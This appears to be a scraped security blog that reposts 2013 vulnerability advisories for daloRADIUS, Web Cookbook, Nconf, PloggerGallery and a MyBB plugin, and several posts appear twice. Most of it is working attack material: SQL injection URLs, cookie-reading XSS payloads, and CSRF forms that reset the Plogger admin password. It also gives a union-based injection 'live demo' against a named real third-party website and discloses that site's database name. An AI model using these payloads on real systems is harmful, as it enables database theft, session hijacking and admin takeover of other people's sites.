http://localhost/daloradius/acct-ipaddress.php?orderBy=[SQLi]
http://localhost/daloradius/acct-ipaddress.php?ipaddress=[SQLi]
http://localhost/daloradius/acct-date.php?orderBy=[SQLi]
http://localhost/daloradius/acct-date.php?username=[SQLi] etc
Proof Of Concept
in acct-ipaddress.php
isset($_GET['orderBy']) ? $orderBy = $_GET['orderBy'] : $orderBy = "radacctid";
isset($_GET['orderType']) ? $orderType = $_GET['orderType'] : $orderType = "asc";
isset($_GET['ipaddress']) ? $ipaddress = $_GET['ipaddress'] : $ipaddress = "";
.
.
.
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, radacct.FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, radacct.AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE FramedIPAddress='$ipaddress';";
In acct-date.php
if ( (isset($_GET['username'])) && ($_GET['username']) ) {
$username = $_GET['username'];
$sql = "SELECT ".$configValues['CONFIG_DB_TBL_RADACCT'].".RadAcctId, ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".name as hotspot, ".$configValues['CONFIG_DB_TBL_RADACCT'].".UserName, ".$configValues['CONFIG_DB_TBL_RADACCT'].".FramedIPAddress, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStartTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctStopTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctSessionTime, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctInputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctOutputOctets, ".$configValues['CONFIG_DB_TBL_RADACCT'].".AcctTerminateCause, ".$configValues['CONFIG_DB_TBL_RADACCT'].".NASIPAddress FROM ".$configValues['CONFIG_DB_TBL_RADACCT']." LEFT JOIN ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS']." ON ".$configValues['CONFIG_DB_TBL_RADACCT'].".calledstationid = ".$configValues['CONFIG_DB_TBL_DALOHOTSPOTS'].".mac WHERE AcctStartTime>'$startdate' and AcctStartTime<'$enddate' and UserName like '$username';";
+---+[ XSS ]+---+
http://localhost/daloradius/rep-logs-daloradius.php?daloradiusLineCount=50&daloradiusFilter=<script>alert(document.cookie);</script>
http://localhost/daloradius/mng-search.php?username=<script>alert(document.cookie);</script>
#Independent Pakistani Security Researcher
Exploit Links:
http://www.exploit-db.com/exploits/24742/
http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html
http://1337day.com/exploit/20501
Exploit
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
#Independent Pakistani Security Researcher
Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]
Database Name:
db394647325
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...
http://www.exploit-db.com/exploits/24742/
http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html
http://1337day.com/exploit/20501
Exploit
# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3
# SQL Injection
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";
A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=
#Independent Pakistani Security Researcher
Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]
Database Name:
db394647325
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...
Hi Today Nconf v1.3 ,Ahh script is highly insecure so just Reported Few of them..
Exploit Links:
http://1337day.com/exploit/20475
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html
# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
Some OF them Are Blind Sqli In handle_item.php on
Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"];
delete_attr.php POST DATA :
id=15'&name=&delete=yes&submit=Delete
Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';
And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more...
A Simple Reflected XSS
http://localhost/nconf/handle_item.php?item=XSS Vector Poc $item_class = $_GET["item"]; . . echo without Sanitization echo ''.ucfirst($handle_action).' '.$item_class.'';
A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a
#Independent Pakistani Security Researcher
Exploit Links:
http://1337day.com/exploit/20475
http://packetstormsecurity.com/files/120628/Nconf-1.3-SQL-Injection-Cross-Site-Scripting.html
# Exploit Title: nconf handle_item.php,Modify_attr.php etc Multiple Sql injection
# Date: 2013/3/4
# Exploit Author: Saadat Ullah,saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/nconf/files/nconf/
# Vendors: http://www.nconf.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Version: nconf 1.3
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
Some OF them Are Blind Sqli In handle_item.php on
Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"];
delete_attr.php POST DATA :
id=15'&name=&delete=yes&submit=Delete
Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';
And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more...
A Simple Reflected XSS
http://localhost/nconf/handle_item.php?item=XSS Vector Poc $item_class = $_GET["item"]; . . echo without Sanitization echo ''.ucfirst($handle_action).' '.$item_class.'';
A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a
#Independent Pakistani Security Researcher
hi , 2 days back my friend need a cms on image gallery so after finding one i Pentest Script and Found highly Insecure. Complete Exploit Can be View Here. 1337day : http://1337day.com/exploit/20470 PacketStrome: http://packetstormsecurity.com/files/120619/PloggerGallery-1.0-RC1-CSRF-XSS-SQL-Injection.html P0c -------------------------------------------------------------------------
# Software : PloggerGallery Version 1.0 RC1
# Author : Saadat Ullah
# Date : 2/3/13
# Dork : Use Ur Mind
# Software Link : http://www.plogger.org/download/
-------------------------------------------------------------------------
+---+[ Feedback.php Sqli ]+---+
Injectable On entries_per_pag Parameter In Feedback.php
http://localhost/plogger/plog-admin/plog-feedback.php?entries_per_page=5'
p0c
if (isset($_REQUEST['entries_per_page'])) {
$_SESSION['entries_per_page'] = $_REQUEST['entries_per_page'];
} else if (!isset($_SESSION['entries_per_page'])) {
$_SESSION['entries_per_page'] = 20;
}
.
.
.
$limit = "LIMIT ".$first_item.", ".$_SESSION['entries_per_page'];
.
.
// Generate javascript init function for ajax editing
$query = "SELECT *, UNIX_TIMESTAMP(`date`) AS `date` from ".PLOGGER_TABLE_PREFIX."comments WHERE `approved` = ".$approved." ORDER BY `id` DESC ".$limit;
$result = run_query($query);
+---+[ CSRF In Admin Panel ]+---+
Plogger is Not using any parameter or security Token to Protect Against CSRF , So its Vuln To CSRF on ALl Locations Inside Admin Panel..
+---+[ XSS ]+---+
Their Are Multiple XSS in Plogger.Like Editing Comment inside Admin Panel.They Are Filtering The Comments For Normal User But Not For Admin.
And AS it is CSRF All Where SO We Can Edit AN Comment VIA CSRF and Change it With Any XSS Vector..
XSS
http://localhost/plogger/plog-admin/plog-feedback.php
Edit Comment With ANy XSS Vector OR JUSt do it VIA CSRF.
Uploading the File and enter name to any XSS Vector..
http://localhost/plogger/plog-admin/plog-upload.php
It Can Me Exploit IN Many Ways LIke
CSRF + SQLI inside Admin panel..which Is define above.
XSS In Edit Comment.CSRF + XSS
<html>
<head>
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-feedback.php" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Comment</div>
<p>
<label class="strong" accesskey="a" for="author">Author:</label><br />
<input size="65" name="author" id="author" value="<script>alert('Hi');</script>" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="e" for="email">Email:</label><br />
<input size="65" name="email" id="email" value="asdf@localhost.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="u" for="url">Website:</label><br />
<input size="65" name="url" id="url" value="http://adsf.com" type="hidden"/>
</p>
<p>
<label class="strong" accesskey="c" for="comment">Comment:</label><br />
<textarea cols="62" rows="4" name="comment" id="comment"><script>alert('Hi');</script></textarea>
</p>
<input type="hidden" name="pid" value="4" />
<input type="hidden" name="action" value="update-comment" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
Another XSS
http://localhost/plogger/plog-admin/plog-manage.php?action=edit-picture&id=1
Edit Caption To XSS Vector Inside Admin PAnel..
Again CSRF + XSS
<form class="edit width-700" action="localhost/plogger/plog-admin/plog-manage.php?level=pictures&id=1" method="post">
<div style="float: right;"><img src="http://localhost/plogger/plog-content/thumbs/plogger-test-collection/plogger-test-album/small/123.png" alt="" /></div>
<div>
<div class="strong">Edit Image Properties</div>
<p>
<label class="strong" accesskey="c" for="caption"><em>C</em>aption:</label><br />
<input size="62" name="caption" id="caption" value="<script>alert(document.cookie);</script>" type="hidden"/>
</p>
<p>
<label class="strong" for="description">Description:</label><br />
<textarea name="description" id="description" cols="60" rows="5"><script>alert(document.cookie);</script></textarea>
</p>
<p><input type="checkbox" id="allow_comments" name="allow_comments" value="1" checked="checked" /><label class="strong" for="allow_comments" accesskey="w">Allo<em>w</em> Comments?</label></p>
<input type="hidden" name="pid" value="1" />
<input type="hidden" name="action" value="update-picture" />
<input class="submit" name="update" value="Update" type="submit" />
<input class="submit-cancel" name="cancel" value="Cancel" type="submit" />
</div>
</form>
CSRF Admin Password Reset And XSS
plog-options.php
<form action="http://localhost/plogger/plog-admin/plog-options.php" method="post">
<table class="option-table" cellspacing="0">
<tbody><tr class="alt">
<td class="left"><label for="admin_username"></label></td>
<td class="right"><input size="40" id="admin_username" name="admin_username" value="admin" type="hidden"></td>
</tr>
<tr>
<td class="left"><label for="admin_email"></label></td>
<td class="right"><input size="40" id="admin_email" name="admin_email" value="localhost@hotmail.com" type="hidden"></td>
</tr>
<tr class="alt">
<td class="left"><label for="admin_password"></label></td>
<td class="right"><input size="40" id="admin_password" name="admin_password" value="123456789" type="hidden"></td>
<tr>
<td class="left"><label for="confirm_admin_password"></label></td>
<td class="right"><input size="40" id="confirm_admin_password" name="confirm_admin_password" value="123456789" type="hidden"></td>
</tr>
<td class="left"><label for="gallery_url"></label></td>
<td class="right"><input size="40" type="text" id="gallery_url" name="gallery_url" value="<script>alert('hi');</script>" type="hidden"/></td></tr>
</tbody></table>
<td class="right"><input class="submit" name="submit" value="DOne" type="submit"></td>
--------------------------------------------------------
# Email - saadi_linux@rocketmail.com
# GreeTz 2 All Pakistani Security Researchers
# Home - http://security-geeks.blogspot.com
---------------------------------------------------------
I was working on some mybb plugins and found some vulns in that..
So for now PRO STAT .
Vendors: http://prostats.wordpress.com
Pro stat is Well known Mybb plugin and vuln to sql injection Inside admin panel and Change viewer.
ITs not much exploitable but bcz u want admin logins but can be handy to dumping the db if u failed to shell it ;)
oka here
Goto Plugins ANd just inject num rows settings..
ITs vuln to most of the parameter inside settings.
LIke POST FIELD ps_num_rows etc.
Screen Shot
READ MORE
Vendors: http://prostats.wordpress.com
Pro stat is Well known Mybb plugin and vuln to sql injection Inside admin panel and Change viewer.
ITs not much exploitable but bcz u want admin logins but can be handy to dumping the db if u failed to shell it ;)
oka here
Goto Plugins ANd just inject num rows settings..
ITs vuln to most of the parameter inside settings.
LIke POST FIELD ps_num_rows etc.
Screen Shot
Sallam ,
I was thinking to make an blog for my security findings and updates so,
All my security updates gona come here..
Cheers
Saadi
READ MORE